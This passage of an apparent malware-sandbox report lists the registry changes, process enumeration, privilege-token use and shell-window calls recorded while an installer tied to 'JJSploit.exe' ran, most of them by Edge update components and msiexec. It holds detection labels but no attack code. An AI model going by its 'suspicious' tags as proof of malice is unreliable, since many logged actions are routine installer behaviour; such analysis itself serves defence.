msedgewebview2.exemsedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedgewebview2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedgewebview2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedgewebview2.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
MicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exemsedgewebview2.exeMicrosoftEdgeUpdate.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133741761354693758" msedgewebview2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeUpdate.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedgewebview2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeUpdate.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\Elevation\Enabled = "1" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\ = "IAppBundleWeb" MicrosoftEdgeUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{77857D02-7A25-4B67-9266-3E122A8F39E4}\VERSIONINDEPENDENTPROGID MicrosoftEdgeUpdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26} MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4} MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\PROGID MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\ProxyStubClsid32\ = "{8208C91C-90E6-4EDA-B96F-A99E0009FBD3}" MicrosoftEdgeUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{9F3F5F5D-721A-4B19-9B5D-69F664C1A591}\PROGID MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9F3F5F5D-721A-4B19-9B5D-69F664C1A591}\AppID = "{A6B716CB-028B-404D-B72C-50E153DD68DA}" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\ = "Microsoft Edge Update Legacy On Demand" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\NumMethods MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ProxyStubClsid32\ = "{B019EEF0-C45E-464D-81C8-23283376FB2C}" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\ = "ICoCreateAsyncStatus" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{77857D02-7A25-4B67-9266-3E122A8F39E4}\VersionIndependentProgID\ = "MicrosoftEdgeUpdate.PolicyStatusMachineFallback" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5F6A18BB-6231-424B-8242-19E5BB94F8ED}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.25\\MicrosoftEdgeUpdateOnDemand.exe\"" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B019EEF0-C45E-464D-81C8-23283376FB2C}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.25\\psmachine.dll" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\ProxyStubClsid32\ = "{B019EEF0-C45E-464D-81C8-23283376FB2C}" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E} MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\ProxyStubClsid32\ = "{B019EEF0-C45E-464D-81C8-23283376FB2C}" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}\NumMethods\ = "9" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE} MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B019EEF0-C45E-464D-81C8-23283376FB2C}\InProcServer32\ThreadingModel = "Both" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebSvc.1.0\ = "Microsoft Edge Update Update3Web" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\NumMethods MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\ = "IAppCommand2" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\NumMethods\ = "4" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods\ = "10" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\ProxyStubClsid32\ = "{8208C91C-90E6-4EDA-B96F-A99E0009FBD3}" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachine.1.0\CLSID\ = "{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E} MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF} MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CoreClass\CurVer\ = "MicrosoftEdgeUpdate.CoreClass.1" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\NumMethods MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4} MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.27\\MicrosoftEdgeUpdateOnDemand.exe\"" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84} MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{897E5069-EE94-48DA-802C-40913293F608}\InprocHandler32\ThreadingModel = "Both" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ProxyStubClsid32\ = "{8208C91C-90E6-4EDA-B96F-A99E0009FBD3}" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\ = "IAppBundleWeb" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\ProxyStubClsid32\ = "{8208C91C-90E6-4EDA-B96F-A99E0009FBD3}" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB} MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE} MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\NumMethods\ = "17" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F7B3738C-9BCA-4B14-90B7-89D0F3A3E497} MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{08D832B9-D2FD-481F-98CF-904D00DF63CC} MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\Elevation\IconReference = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.27\\msedgeupdate.dll,-1004" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachineFallback\CLSID\ = "{77857D02-7A25-4B67-9266-3E122A8F39E4}" MicrosoftEdgeUpdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26} MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17} MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84}\NumMethods\ = "4" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods\ = "10" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\ProxyStubClsid32\ = "{8208C91C-90E6-4EDA-B96F-A99E0009FBD3}" MicrosoftEdgeUpdateComRegisterShell64.exe -
Suspicious behavior: EnumeratesProcesses 33 IoCs
Processes:
msiexec.exepowershell.exeMicrosoftEdgeUpdate.exemsedge.exemsedge.exemsedge.exeidentity_helper.exeMicrosoftEdgeUpdate.exemsedgewebview2.exemsedge.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exepid process 1292 msiexec.exe 1292 msiexec.exe 3780 powershell.exe 3780 powershell.exe 3780 powershell.exe 1044 MicrosoftEdgeUpdate.exe 1044 MicrosoftEdgeUpdate.exe 1044 MicrosoftEdgeUpdate.exe 1044 MicrosoftEdgeUpdate.exe 1044 MicrosoftEdgeUpdate.exe 1044 MicrosoftEdgeUpdate.exe 2276 msedge.exe 2276 msedge.exe 3776 msedge.exe 3776 msedge.exe 5044 msedge.exe 5044 msedge.exe 6008 identity_helper.exe 6008 identity_helper.exe 5644 MicrosoftEdgeUpdate.exe 5644 MicrosoftEdgeUpdate.exe 5644 MicrosoftEdgeUpdate.exe 5644 MicrosoftEdgeUpdate.exe 5440 msedgewebview2.exe 5440 msedgewebview2.exe 4360 msedge.exe 4360 msedge.exe 4360 msedge.exe 4360 msedge.exe 5152 MicrosoftEdgeUpdate.exe 5152 MicrosoftEdgeUpdate.exe 5460 MicrosoftEdgeUpdate.exe 5460 MicrosoftEdgeUpdate.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
Processes:
msedgewebview2.exemsedge.exepid process 3604 msedgewebview2.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 4604 msiexec.exe Token: SeIncreaseQuotaPrivilege 4604 msiexec.exe Token: SeSecurityPrivilege 1292 msiexec.exe Token: SeCreateTokenPrivilege 4604 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4604 msiexec.exe Token: SeLockMemoryPrivilege 4604 msiexec.exe Token: SeIncreaseQuotaPrivilege 4604 msiexec.exe Token: SeMachineAccountPrivilege 4604 msiexec.exe Token: SeTcbPrivilege 4604 msiexec.exe Token: SeSecurityPrivilege 4604 msiexec.exe Token: SeTakeOwnershipPrivilege 4604 msiexec.exe Token: SeLoadDriverPrivilege 4604 msiexec.exe Token: SeSystemProfilePrivilege 4604 msiexec.exe Token: SeSystemtimePrivilege 4604 msiexec.exe Token: SeProfSingleProcessPrivilege 4604 msiexec.exe Token: SeIncBasePriorityPrivilege 4604 msiexec.exe Token: SeCreatePagefilePrivilege 4604 msiexec.exe Token: SeCreatePermanentPrivilege 4604 msiexec.exe Token: SeBackupPrivilege 4604 msiexec.exe Token: SeRestorePrivilege 4604 msiexec.exe Token: SeShutdownPrivilege 4604 msiexec.exe Token: SeDebugPrivilege 4604 msiexec.exe Token: SeAuditPrivilege 4604 msiexec.exe Token: SeSystemEnvironmentPrivilege 4604 msiexec.exe Token: SeChangeNotifyPrivilege 4604 msiexec.exe Token: SeRemoteShutdownPrivilege 4604 msiexec.exe Token: SeUndockPrivilege 4604 msiexec.exe Token: SeSyncAgentPrivilege 4604 msiexec.exe Token: SeEnableDelegationPrivilege 4604 msiexec.exe Token: SeManageVolumePrivilege 4604 msiexec.exe Token: SeImpersonatePrivilege 4604 msiexec.exe Token: SeCreateGlobalPrivilege 4604 msiexec.exe Token: SeCreateTokenPrivilege 4604 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4604 msiexec.exe Token: SeLockMemoryPrivilege 4604 msiexec.exe Token: SeIncreaseQuotaPrivilege 4604 msiexec.exe Token: SeMachineAccountPrivilege 4604 msiexec.exe Token: SeTcbPrivilege 4604 msiexec.exe Token: SeSecurityPrivilege 4604 msiexec.exe Token: SeTakeOwnershipPrivilege 4604 msiexec.exe Token: SeLoadDriverPrivilege 4604 msiexec.exe Token: SeSystemProfilePrivilege 4604 msiexec.exe Token: SeSystemtimePrivilege 4604 msiexec.exe Token: SeProfSingleProcessPrivilege 4604 msiexec.exe Token: SeIncBasePriorityPrivilege 4604 msiexec.exe Token: SeCreatePagefilePrivilege 4604 msiexec.exe Token: SeCreatePermanentPrivilege 4604 msiexec.exe Token: SeBackupPrivilege 4604 msiexec.exe Token: SeRestorePrivilege 4604 msiexec.exe Token: SeShutdownPrivilege 4604 msiexec.exe Token: SeDebugPrivilege 4604 msiexec.exe Token: SeAuditPrivilege 4604 msiexec.exe Token: SeSystemEnvironmentPrivilege 4604 msiexec.exe Token: SeChangeNotifyPrivilege 4604 msiexec.exe Token: SeRemoteShutdownPrivilege 4604 msiexec.exe Token: SeUndockPrivilege 4604 msiexec.exe Token: SeSyncAgentPrivilege 4604 msiexec.exe Token: SeEnableDelegationPrivilege 4604 msiexec.exe Token: SeManageVolumePrivilege 4604 msiexec.exe Token: SeImpersonatePrivilege 4604 msiexec.exe Token: SeCreateGlobalPrivilege 4604 msiexec.exe Token: SeCreateTokenPrivilege 4604 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4604 msiexec.exe Token: SeLockMemoryPrivilege 4604 msiexec.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
Processes:
msiexec.exeJJSploit.exemsedge.exepid process 4604 msiexec.exe 3724 JJSploit.exe 4604 msiexec.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe 5044 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
